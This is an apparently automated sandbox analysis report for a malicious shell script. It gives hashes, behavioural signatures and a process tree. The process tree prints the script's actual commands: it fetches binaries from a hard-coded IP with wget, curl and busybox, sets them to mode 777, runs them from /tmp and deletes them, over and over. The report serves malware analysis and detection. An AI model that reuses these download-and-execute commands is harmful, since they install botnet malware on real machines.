Analysis
-
max time kernel
65s -
max time network
66s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
-
Size
10KB
-
MD5
e85cfec36f14cf1239aeb4b66816d9b6
-
SHA1
54996a37402bd68d4d9592629ba35466aa659e7b
-
SHA256
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583
-
SHA512
300a5cf3328c8392a91bc401ade0843b0d426078b4a7d026b0cfa6bc9959bb8f607eb8cdd63250e780224fc8cb68aea66d2993f7ad08286732684e392cfcf415
-
SSDEEP
192:S9G+eTfUXv3+Cs6BK+u+K+j+2+e+Z9p1gG+BFUp1gGC1xQTfUXvt+Cs6E+u+K+j+:S9G+Hcr+BFOC1xq
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 898 chmod 940 chmod 958 chmod 964 chmod 853 chmod 880 chmod 946 chmod 952 chmod 793 chmod 916 chmod 922 chmod 747 chmod 805 chmod 817 chmod 839 chmod 970 chmod 736 chmod 862 chmod 868 chmod 874 chmod 934 chmod 729 chmod 910 chmod 928 chmod 768 chmod 904 chmod 886 chmod 892 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 730 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 737 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 749 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 769 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 794 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 806 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 818 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 841 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 854 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 863 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 869 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 875 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 881 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 887 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 893 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 899 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 905 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 911 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 917 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 923 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 929 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 935 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 941 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 947 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 953 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 959 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 965 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 971 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl
Processes
-
/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:705
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:726
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:730
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:732
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:733
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:735
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:744
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:764
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:772
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:789
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:804
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:815
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:836
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:852
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:861
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:867
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:873
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:879
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:885
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:891
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:897
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:903
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:909
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:915
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:921
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:927
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:930
